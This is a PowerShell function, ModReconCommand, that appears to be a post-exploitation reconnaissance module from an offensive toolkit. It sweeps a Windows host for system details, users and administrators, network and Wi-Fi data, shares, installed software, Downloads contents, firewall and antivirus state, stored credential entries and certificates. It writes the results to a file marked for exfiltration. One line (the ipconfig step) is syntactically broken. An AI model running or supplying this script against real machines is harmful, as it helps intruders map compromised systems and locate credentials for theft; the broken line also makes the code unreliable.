Function ModReconCommand {
	[CmdletBinding()] param( 
		[string]$reconfile
		)
	function registry_values($regkey, $regvalue,$child) 
	{ 
	if ($child -eq "no"){$key = get-item $regkey} 
			else{$key = get-childitem $regkey} 
			$key | 
			ForEach-Object { 
			$values = Get-ItemProperty $_.PSPath 
			ForEach ($value in $_.Property) 
			{ 
			if ($regvalue -eq "all") {$values.$value} 
			elseif ($regvalue -eq "allname"){$value} 
			else {$values.$regvalue;break} 
			}}}
			$output = "===================== COMPUTER ===================================`r`n"
			echo "0%"
			$output = $output + "`n`n ======= Hostname:`n" + ((hostname)  -join "`r`n")
			$output_tmp = systeminfo
			$output = $output + "`n`n ======= System Info:`n" + $output_tmp 
			$output_tmp = Get-WinSystemLocale
			$output = $output + "`n`n ======= OS Language:`n" + $output_tmp 
			$output = $output + "`n`n ======= Domain Name:`n" + (((Get-WmiObject Win32_ComputerSystem).Domain)  -join "`r`n") 
			$output = $output + "`n`n ======= System:`n" + (((Get-WmiObject -class Win32_OperatingSystem).Caption)  -join "`r`n")
			$output_tmp = Get-WmiObject -Class Win32_Volume | Select DriveLetter,@{Label="FreeSpace (In GB)";Expression={$_.Freespace/1gb}},@{Label="Capacity (In GB)";Expression={$_.Capacity/1gb}},DeviceID,Label |Format-List		
			$output = $output + "`n`n ======= Disk:`n" + $output_tmp 
			echo "10%"
			$output = $output + "`n`n ========================= USERS ==================================`r`n"
			$output = $output + "`n`n ======= Logged in users:`n" + ((registry_values "hklm:\software\microsoft\windows nt\currentversion\profilelist" "profileimagepath") -join "`r`n") 
			$output = $output + "`n`n ======= WhoAmI:`n" + ((whoami)  -join "`r`n") 
			$output = $output + "`n`n ======= Account Policy:`n" + ((net accounts)  -join "`r`n") 
			$output = $output + "`n`n ======= Local users:`n" + ((net user)  -join "`r`n") 
			$output = $output + "`n`n ======= Local Groups:`n" + ((net localgroup)  -join "`r`n") 
			$output_tmp = Get-LocalGroupMember -Group Administrateurs
			$output = $output + "`n`n ====== Local Admins:`n" + $output_tmp 
			$output_tmp = Get-LocalGroupMember -Group Administrators
			$output = $output + "`n`n ======= Local Admins:`n" + $output_tmp 
			echo "30%"
			$output = $output + "`n`n ========================= NETWORK ===============================`r`n"
			$output = $output + "`n`n ======= Network Profiles:`n" + ((Get-NetConnectionProfile)  -join "`r`n")
			$output = $output + "`n`n ======= Network config:`n" + ((ipconfig -all)  -join "`r`nr
			$output = $output + "`n`n ======= ARP Cache:`n" + ((arp -a)  -join "`r`n")
			#$output = $output + "`n`n ======== Open connections:`n" + ((netstat)  -join "`r`n")
			$output = $output + "`n`n ======== Running Services:`n" + ((net start) -join "`r`n")
			$output = $output + "`n`n ======== WLAN Info:`n" + ((netsh wlan show net mode=bssid)  -join "`r`n") 
			echo "50%"
			$output = $output + "`n`n ======================== SHARES AND FOLDER ================================`r`n"
			$output = $output + "`n`n ======= Computers:`n" + ((net view)  -join "`r`n")
			$output = $output + "`n`n ======= Shared folder:`n" + ((Get-SmbShare)  -join "`r`n") 
			$output = $output + "`n`n ======= Shares on the machine:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\LanmanServer\Shares" "all" "no")  -join "`r`n") 		
			echo "70%"
			$output = $output + "`n`n ======================== SOFTWARES AND DOWNLOADS =================`r`n"
			$output = $output + "`n`n ======= Installed Applications:`n" + ((Get-WmiObject -Class Win32_Product | Select-Object -Property Name| out-string)  -join "`r`n")
			$output = $output + "`n`n ======= Softwares folders:`n" + ((Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)')  -join "`r`n")
			$output = $output + "`n`n ======= Startup Commands:`n" + ((Get-CimInstance Win32_StartupCommand)  -join "`r`n")
			$output = $output + "`n`n ======= Downloads:`n" + ((Get-ChildItem  C:\Users\*\Downloads\* -Recurse | Select Name, CreationTime, LastAccessTime, Attributes )  -join "`r`n") 
			echo "90%"
			$output = $output + "`n`n ======================== SECURITY CONFIG ==============================`r`n"
			$output = $output + "`n`n ======= Firewall:`n" + ((netsh firewall show state)  -join "`r`n") 
			$output = $output + "`n`n ======= Open ports:`n" + ((netstat -an | select-string -pattern "listening")  -join "`r`n") 
			$output = $output + "`n`n ======= Credentials Manager:`n" + ((cmdkey /list)  -join "`r`n") 
			$output = $output + "`n`n ======= Antivirus:`n" + ((Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct | out-string)  -join "`r`n")
			$output = $output + "`n`n ======= Certificates Store:`n" + ((Get-ChildItem Cert:\CurrentUser\My)  -join "`r`n") 
			
			# log exfil
			echo "100%"
			
			set-content $reconfile -Value $output
			$resultosend = [IO.File]::ReadAllText($reconfile)
			$resultosend
			}